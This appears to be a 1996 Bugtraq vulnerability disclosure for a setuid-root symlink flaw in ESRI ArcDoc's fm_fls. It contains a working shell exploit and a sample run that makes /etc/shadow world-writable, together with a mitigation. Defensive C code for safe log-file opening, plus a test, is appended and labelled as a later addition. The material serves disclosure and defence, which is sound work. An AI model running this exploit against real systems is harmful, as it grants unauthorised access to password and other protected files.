Bugtraq mailing list archives

Security problem in ESRI's ArcDoc 7.0.4


From: jwa () nbs nau edu (James W. Abendschan)
Date: Thu, 23 May 1996 21:21:46 -0700


*** GIS & ESRI/ARC/Info shops take note! ***

The program "fm_fls" as distributed with ESRI's "ArcDoc" package (7.0.4)
contains a bug which allows us to (a) add somewhat arbitrary data
to any file and (b) change the permissions of that file to rw-rw-rw-.

fm_fls is setuid root.

When fm_fls is executed, it opens up a logfile -- the default location
for this file is /tmp/fm_fls.log.  Unfortunately, it doesn't
check if this file already exists or if this file has any symlinks
attached to it.  If for some reason fm_fls gets bad arguments, it
will write these bad arguments to the logfile, chown the file to
root, give the file 666 permissions, and exit.

If we make a link from this file to an unreadable file, we
can both append the contents of the logfile into the unreadable
file and gain world rw access to the file.

Sample run:

ecosys:~jwa/Security/Projects/r00tin> id
uid=200(jwa) gid=107(cpin)
ecosys:~jwa/Security/Projects/r00tin> ls -l /etc/shadow
-rw-------   1 root     other       1851 May 23 20:22 /etc/shadow
ecosys:~jwa/Security/Projects/r00tin> fm.sploit /etc/shadow
/nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error.  Unable to open License File woot
fm.sploit of /etc/shadow yields:
-rw-rw-rw-   1 root     other       2011 May 23 20:38 /etc/shadow
ecosys:~jwa/Security/Projects/r00tin> tail -5 /etc/shadow
mpm:xxxxxxxxxxxxx:6445::::::
ebp:xxxxxxxxxxxxx:6445::::::
sml:xxxxxxxxxxxxx:6445::::::
1996/05/23-20:38:32 BG woot ecosys
# 1996/05/23-20:38:32 /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error.  Unable to open License File woot
ecosys:~jwa/Security/Projects/r00tin>

Note the additional lines appended to the target file (in this case,
/etc/shadow).

To fix this, either (a) yell at your vendor or (b) chmod 555 `which fm_fls`.
I don't yet know the effects of removing the suid bit on fm_fls; I'd
like to hear feedback on this.  I've seen fm_fls distributed with
other applications -- perhaps the bug is not specific to ARC/Info?

Comments are welcome.

James


#!/bin/sh
#
# exploit a bug in the fm_fls application as distributed with ARC/Info's
# ArcDoc (and others?) to give us rw access to any file.
#
# fix: chmod 555 `which fm_fls`
#
# tested on Solaris 2.5 w/ ArcDoc 7.0.4
#
# James Abendschan  jwa () nbs nau edu  23 May 1996
#

# full path to the fm_fls executable

FM_FLS="/nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls"

LOGFILE=/tmp/fm_fls.log
TMP=/tmp/exploit.$$
UNREADABLE=$1


if [ $# != 1 ]
then
 echo "usage: `basename $0` filename"
 exit 1
fi

rm -f $LOGFILE

if [ -f $LOGFILE ]
then
 echo "tried to remove $LOGFILE, but it still exists!  Exploit won't work."
 exit 1
fi

# since fm_fls will complain if we link to a logfile too "far away"
# from the original file, we just do a dual link..

ln -s $UNREADABLE $TMP
ln -s $TMP $LOGFILE

$FM_FLS woot

echo "`basename $0` of $UNREADABLE yields:"

ls -l $UNREADABLE

# all done, clean up.

rm -f $TMP $LOGFILE
exit 0


--
James W. Abendschan                                 Email: jwa () nbs nau edu
UNIX Systems Programmer/Administrator               Phone: (520) 556-7466 x238
Colorado Plateau Research Station, Flagstaff, AZ    Voice mail: *516
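As an added illustration, not part of the original post or of ESRI's code, the snippet below shows how a privileged program should open a log file such as /tmp/fm_fls.log so that the symlink trick described above is refused: no following of a symlink at the final component, no adopting of a pre-existing file, and no loosening of the mode afterwards. The second function replays the scenario in a scratch directory of my own construction (a "target" file standing in for /etc/shadow); all function names and paths here are my assumptions.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a log file the way a privileged program should: refuse a symlink
 * at the final component, refuse any pre-existing file, create it 0600 and
 * never loosen it afterwards. Returns a descriptor, or -1 on refusal. */
int safe_open_log(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_APPEND, 0600);
    struct stat st;
    if (fd < 0)
        return -1;
    /* belt and braces: what we hold must be a fresh regular file */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Replay the fm_fls scenario in a scratch directory (constructed, not a real
 * system file): "target" stands in for /etc/shadow, "fm_fls.log" is a symlink
 * to it. Returns 1 if the symlink is refused, the target keeps its size and
 * 0600 mode, and a genuinely fresh log path still opens; 0 otherwise. */
int symlink_attack_is_rejected(void)
{
    char dir[] = "/tmp/fmlogXXXXXX", target[64], lnk[64];
    struct stat st;
    int rc = 0, fd;
    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(lnk, sizeof lnk, "%s/fm_fls.log", dir);
    if (close(open(target, O_WRONLY | O_CREAT, 0600)) == 0 && symlink(target, lnk) == 0) {
        fd = safe_open_log(lnk);             /* must fail: the log path is a symlink */
        rc = fd < 0 && stat(target, &st) == 0 && st.st_size == 0 && (st.st_mode & 0777) == 0600;
        if (fd >= 0) close(fd);
        unlink(lnk);
        fd = safe_open_log(lnk);             /* must succeed: nothing is there now */
        rc = rc && fd >= 0;
        if (fd >= 0) close(fd);
    }
    unlink(lnk); unlink(target); rmdir(dir);
    return rc;
}
```

A program that also needs the log to be root-owned should fchown the descriptor it created rather than chown a path, and should leave the 0600 mode alone.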


